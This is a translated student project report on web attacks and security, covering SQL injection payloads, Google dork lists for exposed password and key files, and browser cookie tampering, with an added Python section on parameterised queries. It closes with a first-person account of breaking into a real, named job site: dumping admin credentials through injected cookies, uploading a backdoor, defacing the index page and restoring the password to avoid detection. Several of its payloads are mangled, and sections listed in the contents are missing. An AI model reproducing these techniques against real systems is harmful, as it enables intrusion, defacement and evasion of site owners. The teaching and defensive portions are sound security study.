Project: Understanding Website Attacks and Security (Đồ án Tìm hiểu Tấn công và Bảo mật Web) - Duong Hoang Dai - Nguyen Tuan Dat

Uploaded by: nguyen-manh-hung

Posted on 10-Apr-2018


  • 8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat

    1/98

MINISTRY OF INDUSTRY AND TRADE

CAO THANG TECHNICAL COLLEGE

FACULTY OF ELECTRONICS AND INFORMATICS

PROJECT:

UNDERSTANDING WEBSITE ATTACKS AND SECURITY

Supervisor: Ms. Nguyen Thi Thanh Thuan

Student group:

Duong Hoang Dai, student ID (MSSV): 306081018

Nguyen Tuan Dat, student ID (MSSV): 306081020


Web Programming course project. Topic: Understanding Website Attacks and Security


Instructor's comments:



Table of contents

I. General introduction ........................................ page 04

II. Some ways of attacking websites ............................. page 11

1. Exploiting SQL injection flaws ............................ page 11

2. Using the Google search engine ............................ page 17

3. Using inline JavaScript ................................... page 25

4. DDoS ...................................................... page 28

III. Some ways of securing a website ........................... page 29

1. SSL (Secure Socket Layer) ................................. page 29

2. Tools for surveying and finding flaws in a web server ..... page 71

* Super Scan ............................................. page 75

* SNIFFER ................................................ page 78

* CAIN ................................................... page 81

IV. Conclusion ................................................. page 98


I. General introduction to websites

Before looking at website attacks and security, let us first find out what a website is and how it works.

A website is a network address of the form http://www.companyname.com or http://www.companyname.com.vn that contains many web pages presenting hypertext information such as images, sound, Flash and one or more functions, written in some programming language such as HTML, C# or PHP. A website is opened with a browser available on your computer, such as Internet Explorer, Google Chrome or Opera.

Websites are usually divided into two types:

- Static website: a website without a database, consisting only of pages the designer has produced with web page authoring software. This type suits complex, graphically demanding content that rarely changes, because updating it must be done by specialists, and it is hard to attack.

- Dynamic website: a website with a database, built by professional design companies who hand over tools for managing and updating the site to the customer. Updating the site is very simple and convenient. The information on the site is updated frequently and there is no limit on the amount of information.

A web page is one page within a website, of the form http://www.companyname.com/example.html, where example.html is the name of that page.

Domain name: the domain name is the website's address, and a website must have one. Domain names come in many forms: www.abc.com, www.abc.net, www.abc.com.vn and so on. Some websites do not buy their own domain but use a sub-domain of the form www.abc.com/xyz. Using a sub-domain like this costs nothing to buy; in principle the parent website (that is, www.abc.com) simply gains a few hundred or a few thousand such sub-domains.

Hosting service: for web pages to appear when someone visits them, they must be stored on a computer (a server) that is always running and connected to the Internet. If that computer fails or is switched off at some moment, nobody can reach the websites stored on it during that time. Depending on its needs, a business can buy hosting with 10MB of capacity (holding at most 10MB of data), 20MB, 50MB, 100MB or more. Hosting prices today are very low, from a few tens of thousands to one or two hundred thousand dong per month.

Hacker/Hacking: hackers are people who enjoy studying security on the Internet and practise by attacking websites that have security weaknesses. In general, no website in the world dares to claim absolute security. A hacker can hijack the website's domain name, change the website's content, or flood it with requests (commands that make the server work) so that the website is paralysed for a period of time. A business should ask its hosting provider what recovery policy it has for these situations.

So a website needs a domain name, a place where the web pages are stored (hosting) and a database, all permanently connected to the Internet.

What is website security, and why do we need it?

Website security means using security tools to keep one's website safe, blocking as far as possible the attacks of hackers who want to break in and cause damage or steal confidential information from the website, and keeping the database safe.

Why must a website's database be protected? A website's database is a very important part of a company; losing it seriously affects the company's operations. For example: a company abc has the website abc.com.vn, which is attacked by a hacker who changes its content to that of another company. People who want to contact the company through its website will be disappointed in it because its website was hacked, which harms the company's reputation, not to mention that the hackers may pass the company's financial information or project details to competitors, damaging the company's assets.

So owning a website can be very risky for a company. Why, then, does every company want a website of its own? Here are some reasons:

1. Establish a presence

Approximately 300 million people around the world access the Internet, and the number keeps growing every day. Reaching even 1% of this group of customers would be a success for a business. To be a significant part of the community, and to show that you care about serving it, you need to be present on the Internet. You should know that your competitors are doing the same.

2. Make full use of opportunities for contact

Business is often understood simply as communicating with customers. Every shrewd businessperson understands that "the secret of success lies not in what you know but in which customers you know". Businesspeople all want to turn ordinary meetings into profitable business, and exchanging business cards is valued in this process. But what happens when a business needs to meet thousands, even millions, of partners? Can a business be in contact with all its customers at once? This can be solved very simply, at any time, anywhere, through web pages on the Internet.

3. Create a ready source of information for partners

When you want to produce information or advertising pages, you might place them in the classified ads or the yellow pages, but the time involved will make you think again. And how can an interested customer get in touch with you straight away? How will payment work for each service? Yellow-pages advertising struggles with this because it remains a medium that keeps its distance. In today's age, information needs to be faster and more interactive. The Internet lets you achieve this through information pages kept up 24 hours a day, 7 days a week. Customers can look at information about your business whenever they want, even while you are asleep.

4. Serve customers efficiently

Internet technology gives your business more ways to serve customers. Do you have a team of telephone staff to take customer requests and provide the service information they need? Can customers look up the database themselves and find the information about your services that they want? Customers can do all of this simply and quickly through your business's own website.

5. Attract public attention

You will have trouble persuading magazines to write about you opening a new shop, but you can persuade them to write about your website's name and your new web page if it has plenty of interesting content. With such information, any Internet user can visit the website to learn about your business and may become a potential customer.

6. Publish information at any time

What if you need to publish documents before midnight? Say it is urgent news, or the announcement of the prizes in a promotion. If you send the news to newspaper offices you run into a time constraint: your information is only published with the newspaper's edition, and cannot be changed once the paper is out. With the Internet you can change the news on your business's website within seconds; the latest information is updated and reaches the people waiting for it without going through any messenger.

7. To sell goods

The Internet gives your business a great opportunity to sell goods. The growth of the Internet worldwide has brought into being, and expanded, a new and highly promising market of customers: the community of Internet users. Should you hesitate while your business competitors are step by step entering and capturing market share on the Internet?

8. Present products vividly

If your products are machines, customers will be truly convinced when they see how they work. The Internet opens up many ways of presenting products vividly to customers through your website using images, sound and short video clips. This brings more potential customers to you; no printed brochure can do the same.

9. Reach a high-income market

The number of people on the Internet can form the largest ready-made market there is. Internet users tend to be educated, knowledgeable, with stable positions and high incomes in society. That is why reaching and capturing this customer market is something every business wants to achieve.

10. Answer frequently asked questions

Any telephone operator in your company will tell you that they spend most of their time answering almost identical questions. These are the questions customers want to ask before they do business with you. Putting these questions on the website removes those obstacles to business and frees up time for the telephone staff.

11. Handle internal information

Travelling sales staff may need information updated minute by minute to help them sell and to keep the business running smoothly. If you know what information is needed, you can put it on a private website. With an Internet connection over a local telephone call, your business's sales staff anywhere in the world receive the fullest information without paying long-distance charges, and the office staff are no busier than before.

12. Expand into international markets

In ordinary business you cannot send letters, telephone or circulate your terms to every potential customer on the world market, but with a website you can talk directly to an international customer as though they were local. When your business has representative offices abroad, they can access the home office's information for the cost of a local telephone call.

13. Provide a 24-hour service

We do not all work to the same schedule. Business happens at all times and in all places, not only during office hours. When business is conducted between Europe and Asia, the time difference is a major obstacle. Websites serve your customers and partners 24 hours a day, 7 days a week. Customers can select the information they need and the information they consider important; this is what puts you ahead in the competition even when you are out of the office.

14. Change current information quickly

Some information changes before it is even printed, and you end up with a pile of paper where valid and worthless documents are mixed together. Electronic publications can be changed as you need without paper, ink or invoices. You can also attach your business's website to a database that you can change as many times a day as you wish. No paper document can give you that flexibility.

15. Let you receive feedback from customers

With a website you can ask customers for feedback at the very moment they are visiting your business's site. This saves a great deal of time and money in planning advertising and business strategy on the basis of information gathered from customers, at no further cost. Customers' replies are submitted on the website as they study the product and sent immediately to your e-mail address.

16. Test new services and products on the market

When launching a new product, every business has to advertise and present it. With traditional advertising methods this is a very costly stage requiring a large budget. But if you present and advertise the new product on your business's website, you will know what to expect from the customers who visit it; they are the cheapest market you can reach. They can also tell you what they think of your product most quickly, most easily and at lower cost than in any other market you reach.

17. A flexible communication medium

Today the Internet is regarded as the most professional transmission system because its main product is information that can be accessed easily, quickly and cheaply. All publications distributed over the Internet are becoming more and more popular because the work is done in a digital environment drawing on very many information sources. All of this is done easily through the web pages of your business's own website.

18. Reach a youthful and educational market

Most universities give their students Internet access, and secondary-school pupils will gradually become familiar with and use Internet services over the coming years. Demand for books, sportswear, courses, decorative items and many other things will become the varied demand of the Internet market. Even as e-commerce services are adopted online and the average age rises somewhat, the growth of the under-25 market segment continues.

19. Reach a professional market

The Internet is not merely computers; it is also a place where people can buy, sell and exchange anything from a toothbrush, to works of art, to English lessons, and so on. With 70 million regular users and the number growing daily, your business information can be presented to a very large number of people.

20. Serve the local market

We have talked about the power of serving the international market through the Internet, but what about the market right in your locality? The answer is: through your marketing activities, local customers will come to know your website, access its information on the Internet and bring profit to your company. So wherever the company is located, through the Internet potential customers know about you and you are ready to serve them.

II. Some ways of attacking websites

1. Exploiting SQL injection flaws

1.1 What is SQL injection?

When deploying web applications on the Internet, many people still think that keeping them safe and secure, so as to minimise the chance of being attacked by hackers, is simply a matter of choosing the operating system, the database management system, the web server that will run the application, and so on. They forget that the application itself, running on top of all that, can also harbour a very serious security hole. One such hole is SQL injection. In Vietnam, the days when website administrators worried about scanning for viruses and applying patches to system software are past, yet looking after flaws in the applications themselves receives very little attention. That is why, in the recent period, no small number of websites in Vietnam have been attacked, and most of them through SQL injection flaws [1]. So what is SQL injection?

SQL injection is a technique that lets attackers exploit weaknesses in the input validation of web applications, together with the error messages of the database management system, to "inject" and execute illegitimate SQL statements (ones the application developer did not anticipate). Its consequences are severe, because it lets attackers delete or modify data, having full control over the application's database and possibly even the server the application runs on. This flaw commonly occurs in web applications whose data is managed by database systems such as SQL Server, MySQL, Oracle, DB2 and Sybase.

1.2. Forms of SQL injection attack

There are four common forms: bypassing the login check (authorization bypass), using the SELECT statement, using the INSERT statement, and using stored procedures [2], [3].

Attack that bypasses the login check

With this form of attack, the hacker can easily get past login pages thanks to flaws in the way SQL statements are used to operate on the web application's database.

Consider a typical example. To allow users to reach protected pages, a system normally builds a login page that asks the user to enter a username and password. Once the user has entered them, the system checks whether the username and password are valid and decides whether to allow or refuse further access.

In this case, two pages may be used: an HTML page that displays the input form, and an ASP page that processes what the user entered. For example:

execlogin.asp

login.htm

Username:
Password:


…for a different value and, from there, begin an illegitimate attack, for example: 0 OR 1=1 (that is, http://www.myhost.com/shownews.asp?ID=0 or 1=1).

The SQL query will now return every article in the table, because it executes the statement:

SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1

Another case is, for example, a search page. Such a page lets the user enter search criteria such as surname, given name, and so on. The code is typically of the form:

Similarly to the above, the hacker can take advantage of the weakness in the SQL query and enter, in the author-name field, the string:

' UNION SELECT ALL SELECT OtherField FROM OtherTable WHERE ''=' (*)

Now, besides the first query, which fails, the program also executes the statement that follows the UNION keyword.

Of course the examples above may seem harmless, but imagine that the attacker could wipe the entire database by inserting dangerous statements such as DROP TABLE. For example: ' DROP TABLE T_AUTHORS -

You may wonder how one can tell that a web application has this kind of flaw. It is very simple: enter the string (*) above; if the system reports a syntax error of the form Invalid object name OtherTable, we can be sure that it executed the SELECT after the UNION keyword, since only then could it return the error we deliberately provoked in that SELECT.

One may also wonder how to learn the names of the tables in order to carry out destructive operations once a web application is found to have a SQL injection flaw. This too is simple, because SQL Server has two objects, sysobjects and syscolumns, that allow all table and column names in the system to be listed. We only need to adjust the SELECT statement, for example:

' UNION SELECT name FROM sysobjects WHERE xtype = 'U'

lists the names of all data tables.

Attack using the INSERT statement

Web applications usually let a user register an account in order to take part. An indispensable feature is that, after registering successfully, the user can view and edit their own information. SQL injection can be used when the system does not validate the information entered. For example, an INSERT statement may have the syntax INSERT INTO TableName VALUES('Value One', 'Value Two', 'Value Three'). If the code that builds the SQL statement has the form:

then it will certainly suffer from SQL injection, because if we enter in the first field, for example: ' + (SELECT TOP 1 FieldName FROM TableName) + ', the query becomes: INSERT INTO TableName VALUES(' ' + (SELECT TOP 1 FieldName FROM TableName) + ' ', 'abc', 'def'). Then, when the "view information" function runs, it is as if you had asked for one more statement to be executed: SELECT TOP 1 FieldName FROM TableName

Attack using stored procedures

An attack through stored procedures does very great harm if the application runs with the system administrator account 'sa'. For example, if we change the injected code to the form: ' ; EXEC xp_cmdshell cmd.exe dir C: ', the system will execute a command listing the directories on the C:\ drive where the server is installed. What kind of damage is done depends on the command placed after cmd.exe.

1.3. How to prevent it

It can thus be seen that SQL injection exploits carelessness on the part of web developers when they process input data to build SQL statements. The damage from a SQL injection flaw depends on the environment and how the system is configured. If the application uses the dbo role (the database owner's rights) when working with data, it can drop all the tables, create new tables, and so on. If the application uses the sa account (system administrator rights), it can control the whole database management system, and with such wide privileges it can create illegitimate user accounts to take over your system. To prevent this, we can act at two levels:

1.3.1. Strictly control input data

To prevent the possible risks, protect SQL statements by strictly controlling all input received from the Request object (Request, Request.QueryString, Request.Form, Request.Cookies and Request.ServerVariables). For example, the length of input strings can be limited, or an EscapeQuotes function can be written that replaces each single quote with two single quotes, like this:

Where the input is numeric, the flaw stems from replacing a value expected to be a number with a string containing an illegitimate SQL statement. To avoid this, simply check that the data is of the right type with the IsNumeric() function.

In addition, a function can be written that strips certain dangerous characters and keywords, such as ;, --, select, insert, xp_, and so on, from strings entered by the user, to limit this kind of attack:

1.3.2. Configure the database management system securely

There must be a strict control mechanism that limits the data-handling rights granted to the user account the web application uses. Ordinary applications should avoid roles such as dbo or sa. The more restricted the rights, the smaller the damage.


Also, to avoid the risks of SQL injection attacks, take care to remove any technical information from the messages sent to the user when the application encounters an error. Ordinary error messages reveal technical details that can let an attacker learn the system's weak points.
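The login bypass, the numeric-ID check and the error-message advice above can be seen together in runnable form. The following is an added example written for this edit, not code from the report; it uses Python with an in-memory SQLite database and constructed sample tables (T_USERS, T_NEWS with a few rows) in place of the report's ASP pages. login_vulnerable and show_news_vulnerable build SQL by string concatenation as the report's examples do; login_safe and show_news_safe apply the report's two recommendations, checking the type of the ID (the IsNumeric idea) and passing input as bound parameters, the stronger modern form of the EscapeQuotes idea; run_query_for_user returns the generic error text the last paragraph asks for and sends the detail to the server log instead.

```python
import logging
import sqlite3

log = logging.getLogger("webapp")

# Constructed sample data for this example; not the report's tables.
# Passwords are stored in clear only to keep the demo short; real systems store hashes.
SAMPLE_USERS = [("alice", "correct-horse"), ("bob", "s3cret")]
SAMPLE_NEWS = [(1, "First post"), (2, "Second post"), (3, "Third post")]


def make_db():
    """Create an in-memory SQLite database holding the two sample tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE T_USERS (USERNAME TEXT, PASSWORD TEXT)")
    conn.executemany("INSERT INTO T_USERS VALUES (?, ?)", SAMPLE_USERS)
    conn.execute("CREATE TABLE T_NEWS (NEWS_ID INTEGER, TITLE TEXT)")
    conn.executemany("INSERT INTO T_NEWS VALUES (?, ?)", SAMPLE_NEWS)
    return conn


def login_vulnerable(conn, username, password):
    """Login check built by string concatenation: the input becomes SQL syntax,
    so a password such as  ' OR 1=1 --  turns the WHERE clause into 'always true'."""
    sql = ("SELECT COUNT(*) FROM T_USERS WHERE USERNAME = '" + username
           + "' AND PASSWORD = '" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn, username, password):
    """The same check with bound parameters: the input is compared as data and
    never parsed as SQL, whatever quotes or keywords it contains."""
    sql = "SELECT COUNT(*) FROM T_USERS WHERE USERNAME = ? AND PASSWORD = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def show_news_vulnerable(conn, news_id):
    """shownews.asp?ID=... pattern: the raw query-string value is spliced into the SQL."""
    sql = "SELECT TITLE FROM T_NEWS WHERE NEWS_ID=" + news_id
    return [row[0] for row in conn.execute(sql)]


def show_news_safe(conn, news_id):
    """Check the type first (the IsNumeric idea), then bind the value.
    Returns None for input that is not an integer so the caller can reject it."""
    try:
        numeric_id = int(news_id)
    except ValueError:
        return None
    rows = conn.execute("SELECT TITLE FROM T_NEWS WHERE NEWS_ID=?", (numeric_id,))
    return [row[0] for row in rows]


def run_query_for_user(conn, sql, params=()):
    """Run a query and keep database error details out of the user-facing reply.
    The detailed message goes to the server log; the user sees a generic text."""
    try:
        return "ok", conn.execute(sql, params).fetchall()
    except sqlite3.Error as exc:
        log.error("database error: %s", exc)
        return "error", "The request could not be processed."


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login, injected password:", login_vulnerable(db, "alice", "' OR 1=1 --"))  # True
    print("safe login, same input:", login_safe(db, "alice", "' OR 1=1 --"))                    # False
    print("vulnerable shownews, ID=0 or 1=1:", show_news_vulnerable(db, "0 or 1=1"))            # all three titles
    print("safe shownews, ID=0 or 1=1:", show_news_safe(db, "0 or 1=1"))                        # None
    print(run_query_for_user(db, "SELECT * FROM OtherTable"))                                   # ('error', generic text)
```

The two safe functions never touch the string the user sent when building SQL, which is why the comparison in login_safe simply fails instead of changing the query's logic; the report's EscapeQuotes and keyword-stripping functions try to achieve the same by editing the string, and parameter binding makes that editing unnecessary. The "error" branch is the one to watch when the report's (*) probe string hits a real application: with a generic reply, the invalid-object-name detail that confirms the flaw never reaches the browser.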

References

[1] List of websites with SQL injection flaws: http://www.security.com.vn/

[2] SQL Injection FAQ: http://www.sqlsecurity.com/DesktopDefault.aspx?tabindex=2&tabid=3

[3] Advanced SQL Injection: http://www.nextgenss.com/papers/advanced_sql_injection.pdf

[4] Preventing SQL Injection: http://www.owasp.org/asac/input_validation/sql.shtml

[5] SQL Injection Attacks - Are You Safe? http://www.sitepoint.com/article/794

2. Using the Google search engine

Google is the most powerful and popular search engine in the world. It accepts predefined operators in the query and returns results that are hard to believe. This lets malicious users such as hackers, crackers and script kiddies use Google to collect secret and sensitive information that cannot be seen through ordinary searches. With the advanced search syntax, flawed sites or vulnerable servers can be found.

Advanced search syntax with Google

[intitle:]

Makes Google restrict the results to pages containing that word in the title. For example, intitle: login password (without quotation marks) returns links to pages with the word "login" in the title and the word "password" anywhere in the page.

Similarly, if we want to query for more than one word in the page title, we can use allintitle: instead of intitle to get pages containing all of those words in the title. For example, intitle: login intitle: password is the same as the query allintitle: login password.

Some common intitle queries (each query is followed by what it tends to turn up):

intitle:"Index of" service.pwd
    Directory listing contains service.pwd file(s)

intitle:"Index of" view-source
    Directory listing contains view-source file(s)

intitle:"Index of" admin
    Directory listing contains administrative files or directories

intitle:"Index of" .htpasswd
    Directory listing contains .htpasswd file!

intitle:"Index of" log.txt
    Directory listing contains log text files

intitle:"Index of" stats.html
    Directory listing contains stats.html which may contain useful web server statistics

"access denied for user" "using password"
    Web page contains error message which might provide useful application information

"A syntax error has occurred" filetype:ihtml
    Web page contains error message which might provide useful application information

"ORA-00921: unexpected end of SQL command"
    Web page contains error message which might provide useful application information

inurl:passlist.txt
    The passlist.txt file may contain user passwords

"Index of /backup"
    Directory may contain sensitive backup files

intitle:"Index of" .bash_history
    Directory listing contains bash history information

intitle:"Index of" index.html.bak
    Directory listing contains backup index file (index.html.bak)

intitle:"Index of" index.php.bak
    Directory listing contains backup index file (index.php.bak)

intitle:"Index of" guestbook.cgi
    Directory listing contains backup index file (index.html.bak)

intitle:"Test Page for Apache"
    Default test page for Apache

intitle:index.of.etc
    Directory listing of /etc ?

filetype:xls username password
    XLS spreadsheet containing usernames and passwords?

"This file was generated by Nessus"
    Nessus report!

intitle:"Index of" secring.bak
    Secret key file

intitle:"Terminal Services Web Connection"
    Access terminal services!

intitle:"Remote Desktop Web Connection"
    Access Remote Desktop!

intitle:"Index of" access_log
    Directory listing contains access_log file which may store sensitive information

intitle:"Index of" finance.xls
    Directory listing contains finance.xls which may contain sensitive information

intitle:"Usage Statistics for"
    Statistical information may contain sensitive data

intitle:"Index of" WSFTP.LOG
    WSFTP.LOG file contains information about FTP transactions

intitle:"Index of" ws_ftp.ini
    Directory listing contains password file(s)? The ws_ftp.ini file may contain usernames and passwords of FTP users

"not for distribution" confidential
    URL may contain confidential or sensitive information

"phpMyAdmin" "running on" inurl:"main.php"
    phpMyAdmin allows remote mysql database administration

"#mysql dump" filetype:sql
    mysql database dumps

"This summary was generated by wwwstat"
    Database statistics

"Host Vulnerability Summary Report"
    Vulnerability report!

"Network Vulnerability Assessment Report"
    Vulnerability report!

inurl:php.ini filetype:ini
    The php.ini file may contain sensitive PHP environment details.

BEGIN (CERTIFICATE|DSA|RSA) filetype:key
    Private key(s)!

BEGIN (CERTIFICATE|DSA|RSA) filetype:csr
    Private key(s)!

BEGIN (CERTIFICATE|DSA|RSA) filetype:crt
    Private key(s)!

intitle:"Index of" passwd passwd.bak
    passwd file!

intitle:"Index of" master.passwd
    master.passwd file!

intitle:"Index of" pwd.db
    pwd.db file may contain password information

intitle:"Index of..etc" passwd
    passwd file!

filetype:cfg ks intext:rootpw -sample -test -howto
    This file may contain the root password (encrypted)

intitle:"index.of.personal"
    Directory may contain sensitive information

intitle:"Index of" login.jsp
    The login.jsp file may contain database username or password information

intitle:"Index of" logfile
    Directory may contain sensitive log files

filetype:php inurl:"viewfile" -"index.php" -"idfil
    File may contain PHP source code

allinurl:intranet admin
    Page may contain sensitive information

"supplied argument is not a valid MySQL result resource"
    mysql error message may reveal sensitive information

"Error Diagnostic Information" intitle:"Error Occurred While"
    Error message may reveal sensitive information

HTTP_USER_AGENT=Googlebot
    Page may contain sensitive environment details

[ inurl: ]

The inurl: syntax restricts the search results to URLs that contain the search keyword. For example: inurl: passwd (without quotes) returns links to pages that have the word "passwd" in their URL. Similarly, if we want to query for more than one word in the URL, we can use allinurl: instead of inurl:, and the results are URLs that contain all of the search keywords. For example: allinurl: etc/passwd finds URLs that contain both etc and passwd. The slash (/) between the words is ignored by Google.

[ site: ]

The site: syntax restricts Google to querying the given keywords only within a particular site or domain. For example: exploits site:hackingspirits.com (without quotes) searches for the keyword exploits in the pages currently present under all links of the domain hackingspirits.com. There must be no space between site: and the domain name.

[ filetype: ]

The filetype: syntax restricts Google to searching only files on the Internet with a particular extension (for example doc, pdf or ppt, etc.). For example: filetype:doc site:gov confidential (without quotes) searches for files with the .doc extension in all government domains with the .gov extension that contain the word confidential either in the page or in the .doc file. The results will include links to all such confidential document files on government sites.

[ link: ]

The link: syntax lists the web pages that have links to the specified web page. For example: the string link:SecurityFocus lists the web pages that have links to the SecurityFocus home page. Note that there is no space between "link:" and the URL of the web page.

[ related: ]

The related: syntax lists web pages that are "similar" to the specified web page.

For example: related:www.securityfocus.com lists web pages that are similar to the Securityfocus home page. Remember that there is no space between "related:" and the URL of the web page.

[ cache: ]

The cache: query returns the version of the web page that Google has cached. For example: cache:Hackingspirits shows the page as cached by Google. Remember that there is no space between "cache:" and the URL of the web page.

If you include other words in the query, Google highlights those words within the cached text. For example: cache:Hackingspirits guest shows the cached text with the word "guest" highlighted.

[ intext: ]

The intext: syntax searches for words in the text of a particular website. It ignores links or URLs and the page title. For example: intext:exploits (without quotes) returns links to web pages that have the search keyword "exploits" in their page text.

[ phonebook: ]

phonebook searches for information about US street addresses and phone numbers.

For example: phonebook:Lisa+CA lists all the names of people with Lisa in their name in California (CA). This syntax can be used as an excellent tool by hackers when someone wants to look up personal information for social engineering.

Querying vulnerable sites or servers using Google's advanced syntaxes

Using the "Index of" syntax to find sites that allow directory browsing. Below are a few examples that are used to gain access to a great deal of sensitive information much more easily:

Index of /admin
Index of /passwd
Index of /password
Index of /mail
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"

Finding vulnerable sites or servers using inurl: or allinurl:

a. Using allinurl:winnt/system32/ (without quotes) lists all links to servers that allow access to restricted directories such as system32 through the web. If you are lucky, you may get access to the cmd.exe file in the system32 directory. Once you have access to cmd.exe and can execute it, you can go further and escalate your privileges across the server and compromise it.

b. Using allinurl:wwwboard/passwd.txt (without quotes) in Google search lists all links to servers that are vulnerable to the "WWWBoard password vulnerability". To know more about this vulnerability you can visit the following link: http://www.securiteam.com/exploits/2BUQ4S0SAW.html


c. Using inurl:.bash_history (without quotes) lists all links to servers that allow access to the .bash_history file through the web. This is a command history file. It contains the list of commands executed by the administrator, and sometimes also contains sensitive information such as passwords typed in by the administrator. If this file is compromised and it contains the encrypted passwords of a unix (or *nix) system, they can easily be cracked with the John The Ripper method.

d. Using inurl:config.txt (without quotes) lists all links to servers that allow access to the config.txt file through the web interface. This file contains sensitive information, including the hash value of the administrator password and database authentication credentials. For example: the Ingenium Learning Management System is a web application for Windows systems developed by Click2learn, Inc. Ingenium Learning Management System versions 5.1 and 6.1 store sensitive information insecurely in the config.txt file. For more information go to the following link: http://www.securiteam.com/securitynews/6M00H2K5PG.html

Other similar searches using inurl: or allinurl: combined with other syntaxes:

inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

Finding vulnerable sites or servers using intitle: or allintitle:

a. Using [allintitle: "index of /root"] (without brackets) lists the links to web servers that allow access to restricted directories such as root through the web interface. This directory sometimes contains sensitive information that can easily be retrieved through simple web requests.

b. Using [allintitle: "index of /admin"] (without brackets) lists the links to websites that allow directory browsing of restricted directories such as admin through the web interface. Most web applications sometimes use names such as admin to store administrative privileges in. This directory sometimes contains sensitive information that can easily be retrieved through simple web requests.

Other similar searches using intitle: or allintitle: combined with other syntaxes:

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
allintitle: sensitive filetype:doc
allintitle: restricted filetype:mail
allintitle: restricted filetype:doc site:gov

To find sites vulnerable to Cross-Site Scripting (XSS):

allinurl:/scripts/cart32.exe
allinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php

To find sites vulnerable to SQL Injection:

allinurl:/privmsg.php


3. Using inline JavaScript commands

I will introduce you to a web hacking technique that uses only JavaScript. With this technique you can inspect and modify the values of cookies or hidden fields directly on the web page. All you need is a web browser that supports "debug javascript-inline", such as Internet Explorer, Netscape or Mozilla, etc.

Basics of inline JavaScript

Most web browsers support inline JavaScript. You can execute JavaScript by typing into the URL bar as follows:

Code:

javascript:void()

For example:

To view the current value of the cookie, type:

Code:

javascript:alert(document.cookie)

Or, to change the value of the hidden field "hiddenid" of the first form to "2", use:

Code:

javascript:void(document.forms[0].hiddenid.value="2")

The HTML source contains the following segment:

...

Code:

// the expected answer is stored client-side, only obfuscated with URL escapes
var a=unescape("%43%4f%44%45%5a");

function check()
{
    // comparison happens in the browser, so anyone who can read the source can recover the answer
    if (document.a.c.value == a)
    {
        document.location.href="http://scifi.pages.at/hackits/"+document.a.c.value+".htm";
    }
    else
    {
        alert ("wrong! - letter size?");
    }
}

You can simply type the following into the IE URL bar:

Code:

javascript:alert(unescape(a))

to obtain the password for the next level ("CODEZ").

Realistic mission 8 on hackthissite.org requires you to transfer 10 million from the account of "Gary Hunter" into the account "dropCash". After you have used SQL injection to obtain the username of "Gary Hunter", you carry out the transfer as follows:

Log in to your own account. In the IE URL bar, type:

Code:

javascript:void(document.write('< name="the_" ="movemoney.php" method="post">< value="dropCash"name="TO" ="">< value="10000000" name="AMOUNT" ="">'))

The JavaScript above creates a form with the hidden fields:

Code:

FROM=GaryWilliamHunter, TO=dropCash, AMOUNT=10000000

Now change the cookie as follows:

Code:

javascript:void(document.cookie="accountUsername=GaryWilliamHunter")

javascript:void(document.cookie="accountPassword=GaryWilliamHunter")

Press the "Move Money To A Different Account" button once and it is done.

I think it is very likely that mission 8 creates a session("LoggedIn").


Each time we log in, it sets session("LoggedIn")=1. We only need to change the cookie values and the hidden fields to perform the transfer within our own session, because it only checks that session("LoggedIn")=1 and never checks who the username really is.

As a final example, I will present how the website http://www.mangvieclam.com/ was hacked. I left a message for the admin of mangvieclam.com, but they never contacted me to fix the bug. Hehe, my "message" at the bottom of the index.asp page on mangvieclam.com has still not been deleted by anyone.

After logging in to mangvieclam.com, type javascript:alert(document.cookie) into the URL bar to view the cookie.

You can change the personal information of any user on mangvieclam.com by changing the username cookie as follows: javascript:void(document.cookie="username=user name"), then choose the "Update information" item.

You can also change the password of any user on mangvieclam.com after logging in with your own account, as follows: choose the "Change password" item, type javascript:void(document.cookie="username=username"+escape("' or '1'='1")) into the URL bar, enter anything as the old password together with a new password, then press the "Change password" button.

This bug is in the file icl/filerec/detail.asp, lines 43..65. For example, when you set the username cookie to "trungkien' or '1'='1", the following SQL statements are executed:

Select Count(UserID) As Check From tblUserInfo Where UserID = 'trungkien' or '1'='1' And Passwords='md5(wrong old password)' And Active = 1982 // always returns true because the condition or '1'='1' holds even though the old password is wrong

Update tblUserInfo Set Passwords = 'md5(new password)' Where UserID = 'trungkien' or '1'='1' And Active = 1982 // always sets the new password for the user "trungkien" because the condition UserID = 'trungkien' comes before the condition '1'='1'

Unfortunately, this bug cannot be exploited on http://www.mangvieclam.com/ because of a programming error:

Select Count(UserID) As Check From tblUserInfo Where UserID = N'trungkien' or '1'='1' And Passwords = N'...' And Active = 1982


However, the website http://www.mangvieclam.com/ uses an MS-SQL database, so I easily obtained the admin's username and password from tblConfig as follows:

First I obtained the username with javascript:void(document.cookie="username="+escape("' or 1=convert(int,(select adminid from tblconfig where accid=1))--"))

Choose the "Update information" item.

The admin's login name is 'ngtuan'.

Similarly, I obtained the admin's password with:

Code:

javascript:void(document.cookie="username="+escape("' or 1=convert(int,(select adminpass from tblconfig where accid=1))--"))

Now I set a new password, 'hacked'.

HTML Code:

username:

password:

Upload a backdoor and change the index.asp page. Then restore the admin's old password to avoid detection:


javascript:void(document.cookie="username="+escape("';update tblconfig set adminpass='...' where accid=1--"))

One solution for mangvieclam.com is to replace the variable Request.Cookies("UserName") with the session variable Session("UserName") in order to prevent the username spoofing shown above.
